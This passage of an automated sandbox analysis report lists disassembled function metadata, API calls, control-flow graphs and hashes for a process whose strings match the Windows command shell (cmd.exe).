                                                                                • Part of subcall function 00007FF64B570580: _get_osfhandle.MSVCRT ref: 00007FF64B5705EF
                                                                                • Part of subcall function 00007FF64B570580: GetConsoleMode.KERNELBASE ref: 00007FF64B570605
                                                                                • Part of subcall function 00007FF64B570580: _get_osfhandle.MSVCRT ref: 00007FF64B570632
                                                                                • Part of subcall function 00007FF64B570580: SetConsoleMode.KERNELBASE ref: 00007FF64B570647
                                                                                • Part of subcall function 00007FF64B574A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A28
                                                                                • Part of subcall function 00007FF64B574A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A66
                                                                                • Part of subcall function 00007FF64B574A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A7D
                                                                                • Part of subcall function 00007FF64B574A14: memmove.MSVCRT(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A9A
                                                                                • Part of subcall function 00007FF64B574A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574AA2
                                                                                • Part of subcall function 00007FF64B574AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B568798), ref: 00007FF64B574AD6
                                                                                • Part of subcall function 00007FF64B574AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B568798), ref: 00007FF64B574AEF
                                                                                • Part of subcall function 00007FF64B575554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF64B574E35), ref: 00007FF64B5755DA
                                                                                • Part of subcall function 00007FF64B575554: RegQueryValueExW.KERNELBASE ref: 00007FF64B575623
                                                                                • Part of subcall function 00007FF64B575554: RegQueryValueExW.KERNELBASE ref: 00007FF64B575667
                                                                                • Part of subcall function 00007FF64B575554: RegQueryValueExW.KERNELBASE ref: 00007FF64B5756BE
                                                                                • Part of subcall function 00007FF64B575554: RegQueryValueExW.KERNELBASE ref: 00007FF64B575702
                                                                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574E35
                                                                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574E81
                                                                              • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574F69
                                                                              • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574F95
                                                                              • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574FB0
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574FC1
                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574FD8
                                                                              • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574FF8
                                                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B575037
                                                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B57504B
                                                                              • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B5750DF
                                                                              • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B5750F2
                                                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B57510F
                                                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B575130
                                                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B57514A
                                                                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B575175
                                                                                • Part of subcall function 00007FF64B573578: _get_osfhandle.MSVCRT ref: 00007FF64B573584
                                                                                • Part of subcall function 00007FF64B573578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B57359C
                                                                                • Part of subcall function 00007FF64B573578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735C3
                                                                                • Part of subcall function 00007FF64B573578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735D9
                                                                                • Part of subcall function 00007FF64B573578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735ED
                                                                                • Part of subcall function 00007FF64B573578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B573602
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                              • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                              • API String ID: 1049357271-3021193919
                                                                              • Opcode ID: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                                                              • Instruction ID: 8899bd9489f2bc89799711f04e5cb299e1fe4f576a29081c7df505ebb3f4d256
                                                                              • Opcode Fuzzy Hash: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                                                              • Instruction Fuzzy Hash: 64C14761A0CA42C6EA0CBF11F8142B9E7A1FF8DB91F449135D92E837B3DF7CA5458640

                                                                              Control-flow Graph
                                                                              control_flow_graph 420 7ff64b573c24-7ff64b573c61 421 7ff64b57ec5a-7ff64b57ec5f 420->421 422 7ff64b573c67-7ff64b573c99 call 7ff64b56af14 call 7ff64b56ca40 420->422 421->422 424 7ff64b57ec65-7ff64b57ec6a 421->424 431 7ff64b57ec97-7ff64b57eca1 call 7ff64b57855c 422->431 432 7ff64b573c9f-7ff64b573cb2 call 7ff64b56b900 422->432 426 7ff64b57412e-7ff64b57415b call 7ff64b578f80 424->426 432->431 437 7ff64b573cb8-7ff64b573cbc 432->437 438 7ff64b573cbf-7ff64b573cc7 437->438 438->438 439 7ff64b573cc9-7ff64b573ccd 438->439 440 7ff64b573cd2-7ff64b573cd8 439->440 441 7ff64b573cda-7ff64b573cdf 440->441 442 7ff64b573ce5-7ff64b573d62 GetCurrentDirectoryW towupper iswalpha 440->442 441->442 445 7ff64b573faa-7ff64b573fb3 441->445 443 7ff64b573fb8 442->443 444 7ff64b573d68-7ff64b573d6c 442->444 447 7ff64b573fc6-7ff64b573fec GetLastError call 7ff64b57855c call 7ff64b57a5d6 443->447 444->443 446 7ff64b573d72-7ff64b573dcd towupper GetFullPathNameW 444->446 445->440 446->447 448 7ff64b573dd3-7ff64b573ddd 446->448 451 7ff64b573ff1-7ff64b574007 call 7ff64b57855c _local_unwind 447->451 450 7ff64b573de3-7ff64b573dfb 448->450 448->451 453 7ff64b573e01-7ff64b573e11 450->453 454 7ff64b5740fe-7ff64b574119 call 7ff64b57855c _local_unwind 450->454 461 7ff64b57400c-7ff64b574022 GetLastError 451->461 453->454 457 7ff64b573e17-7ff64b573e28 453->457 466 7ff64b57411a-7ff64b57412c call 7ff64b56ff70 call 7ff64b57855c 454->466 460 7ff64b573e2c-7ff64b573e34 457->460 460->460 463 7ff64b573e36-7ff64b573e3f 460->463 464 7ff64b574028-7ff64b57402b 461->464 465 7ff64b573e95-7ff64b573e9c 461->465 467 7ff64b573e42-7ff64b573e55 463->467 464->465 468 7ff64b574031-7ff64b574047 call 7ff64b57855c _local_unwind 464->468 469 7ff64b573e9e-7ff64b573ec2 call 7ff64b572978 465->469 470 7ff64b573ecf-7ff64b573ed3 465->470 466->426 475 7ff64b573e66-7ff64b573e8f GetFileAttributesW 467->475 476 7ff64b573e57-7ff64b573e60 467->476 493 7ff64b57404c-7ff64b574062 call 7ff64b57855c _local_unwind 468->493 486 7ff64b573ec7-7ff64b573ec9 469->486 472 7ff64b573f08-7ff64b573f0b 470->472 473 7ff64b573ed5-7ff64b573ef7 GetFileAttributesW 470->473 482 7ff64b573f0d-7ff64b573f11 472->482 483 7ff64b573f1e-7ff64b573f40 SetCurrentDirectoryW 472->483 479 7ff64b573efd-7ff64b573f02 473->479 480 7ff64b574067-7ff64b574098 GetLastError call 7ff64b57855c _local_unwind 473->480 475->461 475->465 476->475 484 7ff64b573f9d-7ff64b573fa5 476->484 479->472 488 7ff64b57409d-7ff64b5740b3 call 7ff64b57855c _local_unwind 479->488 480->488 490 7ff64b573f46-7ff64b573f69 call 7ff64b57498c 482->490 491 7ff64b573f13-7ff64b573f1c 482->491 483->490 492 7ff64b5740b8-7ff64b5740de GetLastError call 7ff64b57855c _local_unwind 483->492 484->467 486->470 486->493 488->492 503 7ff64b5740e3-7ff64b5740f9 call 7ff64b57855c _local_unwind 490->503 504 7ff64b573f6f-7ff64b573f98 call 7ff64b57417c 490->504 491->483 491->490 492->503 493->480 503->454 504->466
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                              • String ID: :
                                                                              • API String ID: 1809961153-336475711
                                                                              • Opcode ID: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                                                                              • Instruction ID: 02470bff9ceec18ea08585efdc929fcdc262a4578189b0ff1dd757016a6632c2
                                                                              • Opcode Fuzzy Hash: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                                                                              • Instruction Fuzzy Hash: B4D15E6270CB8592EA28BF15E4442B9F7A1FB8C750F448135DA6E836B6EF7CE545CB00

                                                                              Control-flow Graph
                                                                              control_flow_graph 602 7ff64b572394-7ff64b572416 memset call 7ff64b56ca40 605 7ff64b57241c-7ff64b572453 GetModuleFileNameW call 7ff64b57081c 602->605 606 7ff64b57e0d2-7ff64b57e0da call 7ff64b574c1c 602->606 611 7ff64b57e0db-7ff64b57e0ee call 7ff64b57498c 605->611 612 7ff64b572459-7ff64b572468 call 7ff64b57081c 605->612 606->611 617 7ff64b57e0f4-7ff64b57e107 call 7ff64b57498c 611->617 612->617 618 7ff64b57246e-7ff64b57247d call 7ff64b57081c 612->618 627 7ff64b57e10d-7ff64b57e123 617->627 623 7ff64b572516-7ff64b572529 call 7ff64b57498c 618->623 624 7ff64b572483-7ff64b572492 call 7ff64b57081c 618->624 623->624 624->627 635 7ff64b572498-7ff64b5724a7 call 7ff64b57081c 624->635 630 7ff64b57e125-7ff64b57e139 wcschr 627->630 631 7ff64b57e13f-7ff64b57e17a _wcsupr 627->631 630->631 632 7ff64b57e27c 630->632 633 7ff64b57e17c-7ff64b57e17f 631->633 634 7ff64b57e181-7ff64b57e199 wcsrchr 631->634 637 7ff64b57e283-7ff64b57e29b call 7ff64b57498c 632->637 636 7ff64b57e19c 633->636 634->636 644 7ff64b5724ad-7ff64b5724c5 call 7ff64b573c24 635->644 645 7ff64b57e2a1-7ff64b57e2c3 _wcsicmp 635->645 639 7ff64b57e1a0-7ff64b57e1a7 636->639 637->645 639->639 642 7ff64b57e1a9-7ff64b57e1bb 639->642 646 7ff64b57e264-7ff64b57e277 call 7ff64b571300 642->646 647 7ff64b57e1c1-7ff64b57e1e6 642->647 652 7ff64b5724ca-7ff64b5724db 644->652 646->632 650 7ff64b57e21a 647->650 651 7ff64b57e1e8-7ff64b57e1f1 647->651 657 7ff64b57e21d-7ff64b57e21f 650->657 653 7ff64b57e1f3-7ff64b57e1f6 651->653 654 7ff64b57e201-7ff64b57e210 651->654 655 7ff64b5724dd-7ff64b5724e4 ??_V@YAXPEAX@Z 652->655 656 7ff64b5724e9-7ff64b572514 call 7ff64b578f80 652->656 653->654 658 7ff64b57e1f8-7ff64b57e1ff 653->658 654->650 659 7ff64b57e212-7ff64b57e218 654->659 655->656 657->637 661 7ff64b57e221-7ff64b57e228 657->661 658->653 658->654 659->657 663 7ff64b57e22a-7ff64b57e231 661->663 664 7ff64b57e254-7ff64b57e262 661->664 665 7ff64b57e234-7ff64b57e237 663->665 664->632 665->664 666 7ff64b57e239-7ff64b57e242 665->666 666->664 667 7ff64b57e244-7ff64b57e252 666->667 667->664 667->665
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                              • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                              • API String ID: 2622545777-4197029667
                                                                              • Opcode ID: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                                                                              • Instruction ID: dc8f7e8429f7f48f09cc7281b1b36593ac070dc6b945cad401a459c42c8ef269
                                                                              • Opcode Fuzzy Hash: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                                                                              • Instruction Fuzzy Hash: 51913A61B1DB8286EE29BF54D8542B8E3A5FF4CB84F448535C92E876B6DF7CE5058300

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ConsoleMode_get_osfhandle
                                                                              • String ID: CMD.EXE
                                                                              • API String ID: 1606018815-3025314500
                                                                              • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                              • Instruction ID: 606205e2252657038db90394d01fd250740928c6a89ded98c32441e272369f6c
                                                                              • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                              • Instruction Fuzzy Hash: 5B41AF75A0DA02CBE61CBF14E855278BAA0BF8E755F489135C92EC23B2DF7CA415CA10

                                                                              Control-flow Graph
                                                                              control_flow_graph 680 7ff64b56c620-7ff64b56c66f GetConsoleTitleW 681 7ff64b56c675-7ff64b56c687 call 7ff64b56af14 680->681 682 7ff64b57c5f2 680->682 687 7ff64b56c689 681->687 688 7ff64b56c68e-7ff64b56c69d call 7ff64b56ca40 681->688 684 7ff64b57c5fc-7ff64b57c60c GetLastError 682->684 686 7ff64b57c5e3 call 7ff64b563278 684->686 692 7ff64b57c5e8-7ff64b57c5ed call 7ff64b57855c 686->692 687->688 688->692 694 7ff64b56c6a3-7ff64b56c6ac 688->694 692->682 695 7ff64b56c954-7ff64b56c95e call 7ff64b57291c 694->695 696 7ff64b56c6b2-7ff64b56c6c5 call 7ff64b56b9c0 694->696 701 7ff64b56c964-7ff64b56c972 call 7ff64b5689c0 695->701 702 7ff64b57c5de-7ff64b57c5e0 695->702 703 7ff64b56c6cb-7ff64b56c6ce 696->703 704 7ff64b56c9b5-7ff64b56c9c9 call 7ff64b575c6c call 7ff64b57855c 696->704 701->684 712 7ff64b56c978-7ff64b56c99a towupper 701->712 702->686 703->692 706 7ff64b56c6d4-7ff64b56c6e9 703->706 727 7ff64b56c9d0-7ff64b56c9d7 704->727 709 7ff64b57c616-7ff64b57c620 call 7ff64b57855c 706->709 710 7ff64b56c6ef-7ff64b56c6fa 706->710 713 7ff64b57c627 709->713 710->713 714 7ff64b56c700-7ff64b56c713 710->714 717 7ff64b56c9a0-7ff64b56c9a9 712->717 719 7ff64b57c631 713->719 718 7ff64b56c719-7ff64b56c72c 714->718 714->719 717->717 722 7ff64b56c9ab-7ff64b56c9af 717->722 723 7ff64b57c63b 718->723 724 7ff64b56c732-7ff64b56c747 call 7ff64b56d3f0 718->724 719->723 722->704 725 7ff64b57c60e-7ff64b57c611 call 7ff64b58ec14 722->725 728 7ff64b57c645 723->728 733 7ff64b56c8ac-7ff64b56c8af 724->733 734 7ff64b56c74d-7ff64b56c750 724->734 725->709 731 7ff64b56c9dd-7ff64b57c6da SetConsoleTitleW 727->731 732 7ff64b56c872-7ff64b56c8aa call 7ff64b57855c call 7ff64b578f80 727->732 738 7ff64b57c64e-7ff64b57c651 728->738 731->732 733->734 737 7ff64b56c8b5-7ff64b56c8d3 wcsncmp 733->737 739 7ff64b56c76a-7ff64b56c76d 734->739 740 7ff64b56c752-7ff64b56c764 call 7ff64b56bd38 734->740 737->739 744 7ff64b56c8d9 737->744 745 7ff64b56c80d-7ff64b56c811 738->745 746 7ff64b57c657-7ff64b57c65b 738->746 742 7ff64b56c773-7ff64b56c77a 739->742 743 7ff64b56c840-7ff64b56c84b call 7ff64b56cb40 739->743 740->692 740->739 749 7ff64b56c780-7ff64b56c784 742->749 764 7ff64b56c84d-7ff64b56c855 call 7ff64b56cad4 743->764 765 7ff64b56c856-7ff64b56c85c call 7ff64b567a70 743->765 744->734 751 7ff64b56c817-7ff64b56c81b 745->751 752 7ff64b56c9e2-7ff64b56c9e7 745->752 746->745 755 7ff64b56c83d 749->755 756 7ff64b56c78a-7ff64b56c7a4 wcschr 749->756 758 7ff64b56ca1b-7ff64b56ca1f 751->758 759 7ff64b56c821 751->759 752->751 760 7ff64b56c9ed-7ff64b56c9f7 call 7ff64b57291c 752->760 755->743 762 7ff64b56c7aa-7ff64b56c7ad 756->762 763 7ff64b56c8de-7ff64b56c8f7 756->763 758->759 766 7ff64b56ca25-7ff64b57c6b3 call 7ff64b563278 758->766 767 7ff64b56c824-7ff64b56c82d 759->767 774 7ff64b56c9fd-7ff64b56ca00 760->774 775 7ff64b57c684-7ff64b57c698 call 7ff64b563278 760->775 770 7ff64b56c7b0-7ff64b56c7b8 762->770 771 7ff64b56c900-7ff64b56c908 763->771 764->765 779 7ff64b56c862-7ff64b56c86c 765->779 766->692 767->767 768 7ff64b56c82f-7ff64b56c837 767->768 768->749 768->755 770->770 776 7ff64b56c7ba-7ff64b56c7c7 770->776 771->771 777 7ff64b56c90a-7ff64b56c915 771->777 774->751 781 7ff64b56ca06-7ff64b56ca10 call 7ff64b5689c0 774->781 775->692 776->738 782 7ff64b56c7cd-7ff64b56c7db 776->782 783 7ff64b56c93a-7ff64b56c944 777->783 784 7ff64b56c917 777->784 779->727 779->732 781->751 799 7ff64b56ca16-7ff64b57c67f GetLastError call 7ff64b563278 781->799 788 7ff64b56c7e0-7ff64b56c7e7 782->788 791 7ff64b56ca2a-7ff64b56ca2f call 7ff64b579158 783->791 792 7ff64b56c94a 783->792 789 7ff64b56c920-7ff64b56c928 784->789 794 7ff64b56c7e9-7ff64b56c7f1 788->794 795 7ff64b56c800-7ff64b56c803 788->795 796 7ff64b56c92a-7ff64b56c92f 789->796 797 7ff64b56c932-7ff64b56c938 789->797 791->702 792->695 794->795 800 7ff64b56c7f3-7ff64b56c7fe 794->800 795->728 801 7ff64b56c809 795->801 796->797 797->783 797->789 799->692 800->788 800->795 801->745
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ConsoleTitlewcschr
                                                                              • String ID: /$:
                                                                              • API String ID: 2364928044-4222935259
                                                                              • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                              • Instruction ID: 6f25b35970ab9f552a83017e9f4746e2316982a78b5d77e36edba95d7b75a93a
                                                                              • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                              • Instruction Fuzzy Hash: C4C18D61A0C64291EB6CBF19D4442B9E6B1EF89B90F44A135D93E862F7DF7CE845C700

                                                                              Control-flow Graph
                                                                              control_flow_graph 807 7ff64b567aa0-7ff64b567ad9 808 7ff64b567aeb-7ff64b567b38 memset call 7ff64b56ca40 807->808 809 7ff64b567adb-7ff64b567ae5 call 7ff64b57291c 807->809 814 7ff64b567b3e-7ff64b567b6d GetFullPathNameW 808->814 815 7ff64b57ae4e-7ff64b57ae53 808->815 809->808 816 7ff64b57ae3a-7ff64b57ae49 call 7ff64b563278 809->816 818 7ff64b57ae55-7ff64b57ae5c GetLastError 814->818 819 7ff64b567b73-7ff64b567b78 814->819 817 7ff64b57ae61-7ff64b57ae63 815->817 825 7ff64b567bb7-7ff64b567bdd call 7ff64b578f80 816->825 821 7ff64b57af64-7ff64b57af6b call 7ff64b563278 817->821 818->817 822 7ff64b57ae68-7ff64b57ae6d 819->822 823 7ff64b567b7e-7ff64b567b91 CreateDirectoryW 819->823 826 7ff64b57ae74-7ff64b57ae7e call 7ff64b563278 822->826 827 7ff64b567b93-7ff64b567ba7 823->827 828 7ff64b567bdf-7ff64b567bf2 GetLastError 823->828 842 7ff64b57ae84-7ff64b57ae8e 826->842 831 7ff64b567ba9-7ff64b567bb0 free 827->831 832 7ff64b567bb5 827->832 834 7ff64b567bf8-7ff64b567bfb 828->834 835 7ff64b57ae6f 828->835 831->832 832->825 834->817 839 7ff64b567c01-7ff64b567c08 834->839 835->826 840 7ff64b567c0e-7ff64b567c2e 839->840 841 7ff64b57af5f 839->841 840->842 843 7ff64b567c34-7ff64b567c4a 840->843 841->821 842->841 846 7ff64b57ae94-7ff64b57aea4 842->846 844 7ff64b567cd1-7ff64b567ced CreateDirectoryW 843->844 845 7ff64b567c50 843->845 844->827 849 7ff64b567cf3 844->849 847 7ff64b567cbe-7ff64b567cc1 845->847 846->841 848 7ff64b57aeaa-7ff64b57aeca 846->848 850 7ff64b567cad-7ff64b567cb0 847->850 851 7ff64b567cc3-7ff64b567cc6 847->851 852 7ff64b57aecc 848->852 853 7ff64b57aef1-7ff64b57aef5 848->853 854 7ff64b57af46-7ff64b57af54 GetLastError 849->854 857 7ff64b567c52-7ff64b567c79 CreateDirectoryW 850->857 858 7ff64b567cb2-7ff64b567cbb 850->858 860 7ff64b567cc8 851->860 861 7ff64b567ca5-7ff64b567cab 851->861 862 7ff64b57aecf-7ff64b57aed6 852->862 855 7ff64b57aef7-7ff64b57af00 853->855 856 7ff64b57af03-7ff64b57af0b 853->856 854->827 859 7ff64b57af5a 854->859 855->856 856->844 863 7ff64b57af11-7ff64b57af18 856->863 864 7ff64b567c7b-7ff64b567c89 GetLastError 857->864 865 7ff64b567c8f-7ff64b567ca0 857->865 858->847 859->817 860->857 861->850 866 7ff64b567cca 861->866 862->853 867 7ff64b57aed8-7ff64b57aeef 862->867 868 7ff64b57af1a-7ff64b57af31 863->868 869 7ff64b57af33-7ff64b57af37 863->869 864->841 864->865 865->861 866->844 867->853 867->862 868->863 868->869 869->844 870 7ff64b57af3d 869->870 870->854
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryDriveFullNamePathTypefreememset
                                                                              • String ID:
                                                                              • API String ID: 1445986735-0
                                                                              • Opcode ID: 964aebb90721e81bfd08c07265eff513d24d8c56c735c939700b0a9033b58433
                                                                              • Instruction ID: dfe796a7224a55dadb936a50033af0205a38a17636acaeb1b9555550b087068a
                                                                              • Opcode Fuzzy Hash: 964aebb90721e81bfd08c07265eff513d24d8c56c735c939700b0a9033b58433
